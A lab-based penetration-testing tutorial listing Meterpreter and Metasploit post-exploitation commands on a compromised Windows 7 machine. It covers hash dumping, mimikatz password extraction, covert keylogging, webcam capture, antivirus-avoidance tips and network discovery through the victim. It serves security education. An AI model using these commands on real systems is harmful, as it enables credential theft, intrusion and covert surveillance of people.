Quick Meterpreter and Metasploit tutorial - Stealing hashes and passwords, Keyloggers, Webcams and other post-exploitation modules

I thought that it would be useful, for some readers, if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit.
This is the second video and we will discuss about stealing hashes and passwords, using keyloggers, accessing webcams and invoking other post-exploitation modules.

The first part of this tutorial can be found here:
Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands

LAB details - VM names and IP addresses

Kali6 (Kali Linux, attacker VM):
W7x64-1 (Windows 7, target VM):
W2008R21 (Windows 2008R2, Domain Controller):

Domain name: TESTLAB3

Domain users credentials:
Administrator / P@ssw0rd
testuser1 / P@ssword1
testuser2 / P@ssword1

Local Administrator on W7x64-1 credentials:
WinLocalAdmin / P@ssw0rd

Exploitation process

The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Stealing hashes and passwords 

1. hashdump

This command will dump the contents of the local SAM database, allowing us to get the local user IDs and the password hashes.

The "hashdump" command could trip the antivirus on the target computer and for that reason, it is usually better to use the "smart_hashdump" module instead.

2.  run post/windows/gather/smart_hashdump

"smart_hashdump" is a post-exploitation module which gets the local user IDs and the password hashes from the target computer. It also gets the password hints and it saves all the information to a text file on the Kali local computer.

After we get the hashes, we can try to crack them on an Internet hash cracker website, like Hashkiller or Crackstation

The hashes are in LM:NTLM format. The LM format is usually easier to crack, but depending on how the target computer is configured and how long the password is, the LM hash might not be actually generated and used.

The passwords used in my lab are short and simple and as you can see below, the NTLM hash was quickly cracked on the two websites mentioned before:

Another option for cracking the passwords is to use utilities like  John the Ripper or Hashcat

3.  load mimikatz

The "load mimikatz" command by itself will not get any hashes or passwords. Instead, loading the "mimikatz" module, will allow running additional commands which can extract hashes, passwords, keys, pin codes and tickets from the memory used by the lsass process.

Check the extra commands that can be run after loading the "mimikatz" module:

4.  wdigest

This command will attempt to retrieve the wdigest credentials.

Some of the credentials revealed by the "mimikatz" commands will be in clear text. Because the credentials are grabbed from the lsass process memory; in order for a user password to be revealed in clear text, that user ID should have previously logged into the target computer.
In my lab, I successively logged into the target computer using both local and domain user IDs and therefore commands like "wdigest"or "kerberos" were able to reveal all passwords in clear text.

5.  kerberos

This command will attempt to retrieve the kerberos credentials.

6.  msv

This command will attempt to retrieve the msv credentials (hashes).

7.  mimikatz_command -f sekurlsa::searchPasswords

This is an example of a custom mimikatz command that can be invoked.
sekurlsa interacts with the lsass Windows process running on the target computer and searches for user credentials in its memory.

User interface commands / Keyloggers

8. idletime

This command will display the time duration for which the remote user on the target computer has been idle.

9. screenshot 

This command will grab a screenshot of the desktop on the target computer.
The screenshot will be saved to a file on the local Kali computer.

10.  uictl

The "uictl" command will enable and disable the keyboard and/or mouse on the target computer.

11.  keyscan_start

This command will start the keylogger on the target computer.

In order to intercept the keystrokes, the Meterpreter server on the target computer has to run under the same user context as the remote user. It is not necessary for Meterpreter to be associated with exactly the same Windows process which is receiving the user input, only with another process running under the remote user context. If this command is issued while Meterpreter is associated with process running under the SYSTEM user context, then the keystrokes will not be intercepted.
In the video, we use the "migrate" command to associate Meterpreter with the "explorer.exe" process.

12.  keyscan_dump

This command will dump the keylogger buffer on the attacker's computer screen.

13. keyscan_stop

This command will stop the keylogger on the target computer.

Webcam commands

14. webcam_list

This command will list the webcams available on the target computer.

15. webcam_snap

This command will take a snapshot from the target computer webcam. The snapshot is saved to a file on the local Kali computer.

16.  webcam_stream 

This command will play a video stream from the target computer webcam.

Other post-exploitation modules

17. run post/windows/gather/arp_scanner RHOSTS=<IP_range>

The “arp_scanner” module will perform an ARP scan for a given IP address range, through the remote target computer.
Using this command we will discover hosts hidden behind the firewall, which are accessible via the compromised target computer.

run post/windows/gather/arp_scanner RHOSTS=

18.  run post/windows/gather/checkvm

The “checkvm” module, verifies if the target computer is a virtual machine.

19.   run post/windows/gather/credentials/credential_collector

The “credential_collector” module gets password hashes and tokens from the target computer.

20. run post/windows/gather/dumplinks

The “dumplinks” module parses the .lnk files located in "Recent Documents".
This information could be very useful for further information gathering, because we can find out important data by checking the recently accessed files.

If this command doesn't work as expected, then migrate the Meterpreter server to a different process by using the following command:
run post/windows/manage/migrate

21.  run post/windows/gather/enum_applications

The “enum_applications” module enumerates the applications that are installed on the target computer.

22. run post/windows/gather/enum_logged_on_users

The “enum_logged_on_users” module lists the current and recently logged on users together with their SIDs and profile path.

23. run post/windows/gather/enum_shares

The “enum_shares” module lists the configured and recently used shares on the target computer.

24.  run post/windows/gather/usb_history

The “usb_history” module enumerates the USB drive history on the target computer

25.  run post/multi/recon/local_exploit_suggester session=<Session_ID> [showdescription=true]

The “local_exploit_suggester” module scans  for local vulnerabilities which are exploitable with Metasploit. It then makes suggestions based on the results, as well as displays exploit’s location.

run post/multi/recon/local_exploit_suggester session=6 showdescription=true

Quick Meterpreter and Metasploit tutorial

Stealing hashes and passwords; keyloggers; webcams; other post-exploitation modules


Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux